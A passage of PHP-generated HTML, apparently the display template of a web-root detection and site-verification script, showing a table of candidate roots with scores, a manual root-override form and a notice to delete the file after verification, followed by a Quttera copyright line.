<td>';echo $wl['hta']?'<span class="ok">✓</span>':'<span class="er">✗</span>'; echo '</td>
<td style="color:#45a29e">';echo $wl['score']; echo '</td>
<td style="font-size:11px">';echo htmlspecialchars(implode(', ',$wl['markers'])?:'—'); echo '</td>
<td style="font-size:11px">';echo htmlspecialchars($wl['cms']); echo '</td>
</tr>
';endforeach; echo ' </table></div>
<p style="font-size:11px;color:#333;margin-top:7px">★ = selected root • Score = markers×3 + path-keyword(2) + CMS(2)</p>
</div>
<div class="box full">
<h2>Manual Root Override</h2>
<form method="GET"><input type="text" name="root" value="';echo htmlspecialchars($_GET['root']??''); echo '" placeholder="/var/www/html or C:\\inetpub\\wwwroot"><button type="submit">Re-scan</button></form>
</div>
<div class="box full notice">
<strong style="color:#66fcf1">Keep this file accessible until verification shows success in the panel.</strong>
<span style="font-size:12px;color:#444;margin-top:4px;display:block">Delete it after verification is confirmed.</span>
</div>
</div>
</body></html>';© 2023 Quttera Ltd. All rights reserved.